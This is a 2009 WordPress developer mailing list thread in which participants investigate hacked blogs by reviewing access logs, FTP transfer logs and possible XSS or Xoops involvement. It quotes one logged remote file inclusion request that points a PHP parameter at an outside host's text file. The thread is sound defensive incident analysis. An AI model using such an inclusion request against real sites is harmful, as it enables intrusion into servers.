[wp-hackers] Hacked blogs
Glenn Ansley
glenn at glennansley.com
Thu Mar 26 16:16:52 GMT 2009
There's not an off chance that your server has been using a program
call Xoops or any of its existing integrations with WP is there?
On Thu, Mar 26, 2009 at 12:07 PM, Joost de Valk <joost at yoast.com> wrote:
> Yes I can, and it currently doesn't do anything...
>
>
> Dinh Ba Thanh wrote:
>>
>> Can you try that URL on your web browser, since the remote file is still
>> up?
>>
>> Best Regards,
>> Dinh Ba Thanh, Jason
>> bathanh at gmail.com
>>
>>
>>
>>
>> On Mar 27, 2009, at 12:00 AM, Joost de Valk wrote:
>>
>>> Exactly, it's a check.
>>>
>>> Going through the access logs I can't find anything else yet though, what
>>> we DO see on one of the hosts is that the "infected" files were uploaded
>>> through FTP (we can see that in the xfer.log), but if I'm not mistaken, that
>>> could still be done through XSS right?
>>>
>>> Dinh Ba Thanh wrote:
>>>>
>>>> If the attacker is able to inject that chunk of code, other things could
>>>> be include as well, eg: shell
>>>>
>>>> Best Regards,
>>>> Dinh Ba Thanh, Jason
>>>> bathanh at gmail.com
>>>>
>>>>
>>>>
>>>>
>>>> On Mar 26, 2009, at 11:53 PM, Peter van der Does wrote:
>>>>
>>>>> On Thu, 26 Mar 2009 16:44:01 +0100
>>>>> Joost de Valk <joost at yoast.com> wrote:
>>>>>
>>>>>> Nope, can't find a bloody thing yet. These kind of requests:
>>>>>>
>>>>>> GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt????
>>>>>> HTTP/1.1
>>>>>>
>>>>>> in all the logs, but grepping through the entire htdocs dir, nothing
>>>>>> that responds to them.
>>>>>
>>>>> I don't believe that attack is what caused your problem.
>>>>> The script that is called is a killroy script.
>>>>> It will show server related information, like the OS, Uptime. Stuff
>>>>> like that and "<insert name> was here .."
>>>>>
>>>>> --
>>>>> Peter van der Does
>>>>>
>>>>> GPG key: E77E8E98
>>>>>
>>>>> WordPress Plugin Developer
>>>>> http://blog.avirtualhome.com
>>>>>
>>>>> GetDeb Package Builder/GetDeb Site Coder
>>>>> http://www.getdeb.net - Software you want for Ubuntu
>>>>> _______________________________________________
>>>>> wp-hackers mailing list
>>>>> wp-hackers at lists.automattic.com
>>>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>>>
>>>> _______________________________________________
>>>> wp-hackers mailing list
>>>> wp-hackers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>>
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
More information about the wp-hackers
mailing list